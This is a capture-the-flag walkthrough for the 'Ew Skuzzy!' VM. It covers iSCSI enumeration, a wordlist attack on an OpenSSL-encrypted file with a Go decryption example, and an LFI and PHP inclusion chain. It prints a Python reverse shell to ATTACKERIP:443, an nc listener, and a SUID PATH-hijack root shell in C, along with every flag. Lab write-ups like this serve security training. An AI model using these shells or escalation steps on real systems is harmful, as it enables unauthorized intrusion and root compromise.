Quick Walkthrough for Ew Skuzzy!
- Boot the VM in VirtualBox. The IP address assigned via DHCP is displayed on the login screen in the VM console.
- Scan the IP with Nmap. Three ports are visible:
- ssh
- http
- iscsi
- Skip SSH: the VM has accounts which work with passwords, but I guarantee the passwords are NOT brute-forceable in a shorter time than the designed path to root :).
- Scan the HTTP Server with 'dirb' and 'common.txt', and enjoy what you find.
- Direct all hate to /dev/null, I'm just messing with you :p
- Realise the name of the VM is a pointer to the path :)
- Kali needs the open-iscsi tools (iscsiadm) installed:
- apt install open-iscsi
- Scan the iSCSI server:
- iscsiadm -m discovery -t st -p IP:3260
- Discovery returns the iSCSI target:
- IP:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
- Mount iSCSI share:
- iscsiadm -m node -p IP -l --target iqn.2017-02.local.skuzzy:storage.sys0
- Check that the disk is available:
- fdisk -l
- Make a mountpoint
- mkdir /media/iscsi
- Mount the disk:
- mount /dev/sdb /media/iscsi
- Browse to the disk:
- cd /media/iscsi
- Find flag 1!
- flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
- Make another mount point:
- mkdir /media/bobsdisk
- Mount the disk image:
- mount /media/iscsi/bobsdisk.dsk /media/bobsdisk
- Read the file:
- cat /media/bobsdisk/ToAlice.eml
- Discover flag2, and clues to decrypt ToAlice.csv.enc
- flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
- Decrypt ToAlice.csv.enc
- The clue is a 256-bit key, i.e. 32 bytes.
- Pull all 32-character strings from rockyou.txt:
- awk 'length($0) == 32' rockyou.txt > 32char_strings.txt
- Check each one with a script.
- password: supercalifragilisticoespialidoso
- openssl aes-256-cbc -d -k password -in ToAlice.csv.enc -out ToAlice.csv -md sha256
- View contents of file:
- cat ToAlice.csv
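What the openssl command above actually does, shown as an added example (Go, standard library only; not part of the original walkthrough): parse the Salted__ header, derive key and IV from the passphrase with OpenSSL's EVP_BytesToKey (one SHA-256 pass when -md sha256 is given, which is why that flag has to match the encrypting side), then AES-256-CBC decrypt and strip the PKCS#7 padding. Because that derivation is a single digest pass, the ciphertext is only as strong as the passphrase, which is the whole reason the wordlist step works. The passphrase, salt and CSV content below are constructed sample values, and opensslEncrypt exists only to build the sample blob.

```go
package main
import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"errors"
)

// evpBytesToKey mirrors OpenSSL's EVP_BytesToKey with SHA-256, one iteration:
// D1 = H(pass||salt), Di = H(D(i-1)||pass||salt), concatenated until key+IV fit.
func evpBytesToKey(pass, salt []byte, keyLen, ivLen int) (key, iv []byte) {
	var out, prev []byte
	for len(out) < keyLen+ivLen {
		h := sha256.New()
		h.Write(prev)
		h.Write(pass)
		h.Write(salt)
		prev = h.Sum(nil)
		out = append(out, prev...)
	}
	return out[:keyLen], out[keyLen : keyLen+ivLen]
}
// opensslDecrypt parses "Salted__" || 8-byte salt || ciphertext as written by
// "openssl enc -aes-256-cbc -md sha256", decrypts and strips PKCS#7 padding.
func opensslDecrypt(pass, blob []byte) ([]byte, error) {
	if len(blob) < 32 || len(blob)%16 != 0 || string(blob[:8]) != "Salted__" {
		return nil, errors.New("not an OpenSSL salted AES-CBC blob")
	}
	key, iv := evpBytesToKey(pass, blob[8:16], 32, 16)
	block, _ := aes.NewCipher(key) // key is always 32 bytes, so no error here
	pt := make([]byte, len(blob)-16)
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, blob[16:])
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > 16 || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad padding: wrong passphrase or digest")
	}
	return pt[:len(pt)-pad], nil
}
// opensslEncrypt writes the same layout; used here only to build a constructed sample blob.
func opensslEncrypt(pass, salt, plain []byte) []byte {
	key, iv := evpBytesToKey(pass, salt, 32, 16)
	block, _ := aes.NewCipher(key)
	pad := 16 - len(plain)%16
	padded := append(append([]byte{}, plain...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append([]byte("Salted__"), salt...), ct...)
}
```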
- URLs point to directories on the http server
- http://IP/5560a1468022758dba5e92ac8f2353c0 - Interesting site, no flags.
- http://IP/c2444910794e037ebd8aaf257178c90b - The intended application with method of entry
- Find Flag 3
- flag3{2cce194f49c6e423967b7f72316f48c5caf46e84}
- Access vulnerable PHP application
- Note that two vulnerabilities must be chained to get a shell: an LFI and a PHP misconfiguration.
- Access 'flag' link.
- Rage because there is no flag in the page or the source.
- Use LFI Vulnerability to access flag content:
- Decode content provided in page to get actual flag:
- echo "base64content" | base64 -d -
- flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
- The flag IS NEEDED for the next step of the challenge.
- To get shell:
- Access "Feed Reader" link.
- Select "Load Feed" link.
- Note the format of the URL parameters.
- Using the LFI vulnerability above, view the source of reader.php.
- View the source of the page being loaded, and note the tags used to denote PHP:
- ##php##
- reader.php requires a key when loading from another server
- The parameter is a URL parameter 'key'.
- Access the URL with the parameter key specified
- attackscript.txt contains PHP that spawns a reverse shell.
- Example shell:
print("See? RCE!");
exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKERIP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");
- Start NC:
- nc -vlp 443
- Catch shell!
- To get root:
- There is a SUID binary, /opt/alicebackup, which runs 'scp' via a PATH lookup rather than an absolute path.
- Create a script or binary to be executed in its place:
- Code, shell.c:
    #include <unistd.h>

    int main(void) {
        setgid(0);   /* become the root group */
        setuid(0);   /* become root */
        execl("/bin/sh", "sh", (char *)0);
        return 1;    /* only reached if execl fails */
    }
- Compile, output to 'scp' binary
- gcc -o scp shell.c
- Copy to /tmp
- Set path:
- export PATH=/tmp:$PATH
- Set Permissions
- chmod a+x /tmp/scp
- Get root!
- /opt/alicebackup
- Final flag is in /root
DONE!
Thanks for playing - very interested in hearing feedback!